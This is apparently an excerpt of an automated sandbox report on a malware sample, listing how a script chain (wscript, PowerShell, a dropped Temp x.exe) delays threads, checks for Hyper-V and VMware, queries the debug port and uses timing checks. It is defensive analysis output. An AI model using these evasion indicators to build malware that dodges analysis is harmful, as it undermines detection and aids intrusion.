          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599875Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599656Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599547Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599437Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599328Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599219Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599094Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598985Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598860Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598735Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598610Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598469Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598331Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598203Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598094Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597985Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597860Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597735Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597610Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597485Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597360Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597235Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: wscript.exe, 00000000.00000002.1810546269.000001E28D81A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: wscript.exe, 00000000.00000002.1810546269.000001E28D81A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\@j
          Source: powershell.exe, 00000001.00000002.1804047909.000001833A9B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
          Source: wscript.exe, 00000000.00000003.1808239303.000001E28B7DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1810254418.000001E28B7E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1808184117.000001E28B7CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWes
          Source: wscript.exe, 00000000.00000003.1808239303.000001E28B7DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1810254418.000001E28B7E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1808184117.000001E28B7CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
          Source: x.exe, 00000003.00000002.1840260458.0000000001122000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019FD1C0 rdtsc 4_2_019FD1C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00417193 LdrLoadDll,4_2_00417193
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197A197 mov eax, dword ptr fs:[00000030h]4_2_0197A197
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197A197 mov eax, dword ptr fs:[00000030h]4_2_0197A197
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197A197 mov eax, dword ptr fs:[00000030h]4_2_0197A197
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A311A4 mov eax, dword ptr fs:[00000030h]4_2_01A311A4
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A311A4 mov eax, dword ptr fs:[00000030h]4_2_01A311A4
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A311A4 mov eax, dword ptr fs:[00000030h]4_2_01A311A4
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A311A4 mov eax, dword ptr fs:[00000030h]4_2_01A311A4
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019D7190 mov eax, dword ptr fs:[00000030h]4_2_019D7190
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C0185 mov eax, dword ptr fs:[00000030h]4_2_019C0185
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0199B1B0 mov eax, dword ptr fs:[00000030h]4_2_0199B1B0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A3C188 mov eax, dword ptr fs:[00000030h]4_2_01A3C188
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A3C188 mov eax, dword ptr fs:[00000030h]4_2_01A3C188
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A0019F mov eax, dword ptr fs:[00000030h]4_2_01A0019F
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A0019F mov eax, dword ptr fs:[00000030h]4_2_01A0019F
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A0019F mov eax, dword ptr fs:[00000030h]4_2_01A0019F
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A0019F mov eax, dword ptr fs:[00000030h]4_2_01A0019F
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A561E5 mov eax, dword ptr fs:[00000030h]4_2_01A561E5
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BD1D0 mov eax, dword ptr fs:[00000030h]4_2_019BD1D0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BD1D0 mov ecx, dword ptr fs:[00000030h]4_2_019BD1D0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019FE1D0 mov eax, dword ptr fs:[00000030h]4_2_019FE1D0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019FE1D0 mov eax, dword ptr fs:[00000030h]4_2_019FE1D0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019FE1D0 mov ecx, dword ptr fs:[00000030h]4_2_019FE1D0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019FE1D0 mov eax, dword ptr fs:[00000030h]4_2_019FE1D0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019FE1D0 mov eax, dword ptr fs:[00000030h]4_2_019FE1D0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A271F9 mov esi, dword ptr fs:[00000030h]4_2_01A271F9
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019B01F8 mov eax, dword ptr fs:[00000030h]4_2_019B01F8
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A461C3 mov eax, dword ptr fs:[00000030h]4_2_01A461C3
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A461C3 mov eax, dword ptr fs:[00000030h]4_2_01A461C3
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A551CB mov eax, dword ptr fs:[00000030h]4_2_01A551CB
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A51EF mov eax, dword ptr fs:[00000030h]4_2_019A51EF
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A51EF mov eax, dword ptr fs:[00000030h]4_2_019A51EF
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A51EF mov eax, dword ptr fs:[00000030h]4_2_019A51EF
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A51EF mov eax, dword ptr fs:[00000030h]4_2_019A51EF
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A51EF mov eax, dword ptr fs:[00000030h]4_2_019A51EF
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A51EF mov eax, dword ptr fs:[00000030h]4_2_019A51EF
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A51EF mov eax, dword ptr fs:[00000030h]4_2_019A51EF
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A51EF mov eax, dword ptr fs:[00000030h]4_2_019A51EF
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A51EF mov eax, dword ptr fs:[00000030h]4_2_019A51EF
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A51EF mov eax, dword ptr fs:[00000030h]4_2_019A51EF
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A51EF mov eax, dword ptr fs:[00000030h]4_2_019A51EF
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A51EF mov eax, dword ptr fs:[00000030h]4_2_019A51EF
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A51EF mov eax, dword ptr fs:[00000030h]4_2_019A51EF
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019851ED mov eax, dword ptr fs:[00000030h]4_2_019851ED
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197B136 mov eax, dword ptr fs:[00000030h]4_2_0197B136
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197B136 mov eax, dword ptr fs:[00000030h]4_2_0197B136
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197B136 mov eax, dword ptr fs:[00000030h]4_2_0197B136
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197B136 mov eax, dword ptr fs:[00000030h]4_2_0197B136
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01981131 mov eax, dword ptr fs:[00000030h]4_2_01981131
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01981131 mov eax, dword ptr fs:[00000030h]4_2_01981131
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A40115 mov eax, dword ptr fs:[00000030h]4_2_01A40115
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A2A118 mov ecx, dword ptr fs:[00000030h]4_2_01A2A118
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A2A118 mov eax, dword ptr fs:[00000030h]4_2_01A2A118
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A2A118 mov eax, dword ptr fs:[00000030h]4_2_01A2A118
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A2A118 mov eax, dword ptr fs:[00000030h]4_2_01A2A118
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019B0124 mov eax, dword ptr fs:[00000030h]4_2_019B0124
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197C156 mov eax, dword ptr fs:[00000030h]4_2_0197C156
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01987152 mov eax, dword ptr fs:[00000030h]4_2_01987152
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01986154 mov eax, dword ptr fs:[00000030h]4_2_01986154
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01986154 mov eax, dword ptr fs:[00000030h]4_2_01986154
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A19179 mov eax, dword ptr fs:[00000030h]4_2_01A19179
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01979148 mov eax, dword ptr fs:[00000030h]4_2_01979148
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01979148 mov eax, dword ptr fs:[00000030h]4_2_01979148
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01979148 mov eax, dword ptr fs:[00000030h]4_2_01979148
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01979148 mov eax, dword ptr fs:[00000030h]4_2_01979148
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]4_2_0197F172
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]4_2_0197F172
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]4_2_0197F172
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]4_2_0197F172
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]4_2_0197F172
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]4_2_0197F172
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]4_2_0197F172
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]4_2_0197F172
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]4_2_0197F172
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]4_2_0197F172
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]4_2_0197F172
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]4_2_0197F172
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]4_2_0197F172
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]4_2_0197F172
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]4_2_0197F172
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]4_2_0197F172
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]4_2_0197F172
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]4_2_0197F172
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]4_2_0197F172
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]4_2_0197F172
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]4_2_0197F172
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A14144 mov eax, dword ptr fs:[00000030h]4_2_01A14144
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A14144 mov eax, dword ptr fs:[00000030h]4_2_01A14144
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A14144 mov ecx, dword ptr fs:[00000030h]4_2_01A14144
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A14144 mov eax, dword ptr fs:[00000030h]4_2_01A14144
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A14144 mov eax, dword ptr fs:[00000030h]4_2_01A14144
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A55152 mov eax, dword ptr fs:[00000030h]4_2_01A55152
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A18158 mov eax, dword ptr fs:[00000030h]4_2_01A18158
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019B909C mov eax, dword ptr fs:[00000030h]4_2_019B909C
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AD090 mov eax, dword ptr fs:[00000030h]4_2_019AD090
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AD090 mov eax, dword ptr fs:[00000030h]4_2_019AD090
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01985096 mov eax, dword ptr fs:[00000030h]4_2_01985096
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198208A mov eax, dword ptr fs:[00000030h]4_2_0198208A
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197D08D mov eax, dword ptr fs:[00000030h]4_2_0197D08D
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A460B8 mov eax, dword ptr fs:[00000030h]4_2_01A460B8
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A460B8 mov ecx, dword ptr fs:[00000030h]4_2_01A460B8
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A060E0 mov eax, dword ptr fs:[00000030h]4_2_01A060E0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A90DB mov eax, dword ptr fs:[00000030h]4_2_019A90DB
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]4_2_019970C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019970C0 mov ecx, dword ptr fs:[00000030h]4_2_019970C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019970C0 mov ecx, dword ptr fs:[00000030h]4_2_019970C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]4_2_019970C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019970C0 mov ecx, dword ptr fs:[00000030h]4_2_019970C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019970C0 mov ecx, dword ptr fs:[00000030h]4_2_019970C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]4_2_019970C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]4_2_019970C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]4_2_019970C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]4_2_019970C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]4_2_019970C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]4_2_019970C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]4_2_019970C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]4_2_019970C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]4_2_019970C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]4_2_019970C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]4_2_019970C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]4_2_019970C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019FD0C0 mov eax, dword ptr fs:[00000030h]4_2_019FD0C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019FD0C0 mov eax, dword ptr fs:[00000030h]4_2_019FD0C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197C0F0 mov eax, dword ptr fs:[00000030h]4_2_0197C0F0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C20F0 mov ecx, dword ptr fs:[00000030h]4_2_019C20F0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019880E9 mov eax, dword ptr fs:[00000030h]4_2_019880E9
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0197A0E3
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A550D9 mov eax, dword ptr fs:[00000030h]4_2_01A550D9
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A020DE mov eax, dword ptr fs:[00000030h]4_2_01A020DE
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A50E4 mov eax, dword ptr fs:[00000030h]4_2_019A50E4
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A50E4 mov ecx, dword ptr fs:[00000030h]4_2_019A50E4
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0199E016 mov eax, dword ptr fs:[00000030h]4_2_0199E016
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0199E016 mov eax, dword ptr fs:[00000030h]4_2_0199E016
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0199E016 mov eax, dword ptr fs:[00000030h]4_2_0199E016
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0199E016 mov eax, dword ptr fs:[00000030h]4_2_0199E016
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A4903E mov eax, dword ptr fs:[00000030h]4_2_01A4903E
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A4903E mov eax, dword ptr fs:[00000030h]4_2_01A4903E
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A4903E mov eax, dword ptr fs:[00000030h]4_2_01A4903E
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A4903E mov eax, dword ptr fs:[00000030h]4_2_01A4903E
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A04000 mov ecx, dword ptr fs:[00000030h]4_2_01A04000
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197A020 mov eax, dword ptr fs:[00000030h]4_2_0197A020
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197C020 mov eax, dword ptr fs:[00000030h]4_2_0197C020
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A55060 mov eax, dword ptr fs:[00000030h]4_2_01A55060
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01982050 mov eax, dword ptr fs:[00000030h]4_2_01982050
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AB052 mov eax, dword ptr fs:[00000030h]4_2_019AB052
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A0106E mov eax, dword ptr fs:[00000030h]4_2_01A0106E
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01991070 mov eax, dword ptr fs:[00000030h]4_2_01991070
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01991070 mov ecx, dword ptr fs:[00000030h]4_2_01991070
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01991070 mov eax, dword ptr fs:[00000030h]4_2_01991070
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01991070 mov eax, dword ptr fs:[00000030h]4_2_01991070
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01991070 mov eax, dword ptr fs:[00000030h]4_2_01991070
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01991070 mov eax, dword ptr fs:[00000030h]4_2_01991070
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01991070 mov eax, dword ptr fs:[00000030h]4_2_01991070
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01991070 mov eax, dword ptr fs:[00000030h]4_2_01991070
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01991070 mov eax, dword ptr fs:[00000030h]4_2_01991070
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01991070 mov eax, dword ptr fs:[00000030h]4_2_01991070
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01991070 mov eax, dword ptr fs:[00000030h]4_2_01991070
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01991070 mov eax, dword ptr fs:[00000030h]4_2_01991070
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01991070 mov eax, dword ptr fs:[00000030h]4_2_01991070
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AC073 mov eax, dword ptr fs:[00000030h]4_2_019AC073
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019FD070 mov ecx, dword ptr fs:[00000030h]4_2_019FD070
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A06050 mov eax, dword ptr fs:[00000030h]4_2_01A06050
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A2705E mov ebx, dword ptr fs:[00000030h]4_2_01A2705E
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A2705E mov eax, dword ptr fs:[00000030h]4_2_01A2705E
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01978397 mov eax, dword ptr fs:[00000030h]4_2_01978397
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01978397 mov eax, dword ptr fs:[00000030h]4_2_01978397
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01978397 mov eax, dword ptr fs:[00000030h]4_2_01978397
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019D739A mov eax, dword ptr fs:[00000030h]4_2_019D739A
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019D739A mov eax, dword ptr fs:[00000030h]4_2_019D739A
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A438F mov eax, dword ptr fs:[00000030h]4_2_019A438F
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A438F mov eax, dword ptr fs:[00000030h]4_2_019A438F
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197E388 mov eax, dword ptr fs:[00000030h]4_2_0197E388
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197E388 mov eax, dword ptr fs:[00000030h]4_2_0197E388
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197E388 mov eax, dword ptr fs:[00000030h]4_2_0197E388
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A5539D mov eax, dword ptr fs:[00000030h]4_2_01A5539D
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019B33A0 mov eax, dword ptr fs:[00000030h]4_2_019B33A0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019B33A0 mov eax, dword ptr fs:[00000030h]4_2_019B33A0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A33A5 mov eax, dword ptr fs:[00000030h]4_2_019A33A5
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A3F3E6 mov eax, dword ptr fs:[00000030h]4_2_01A3F3E6
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198A3C0 mov eax, dword ptr fs:[00000030h]4_2_0198A3C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198A3C0 mov eax, dword ptr fs:[00000030h]4_2_0198A3C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198A3C0 mov eax, dword ptr fs:[00000030h]4_2_0198A3C0
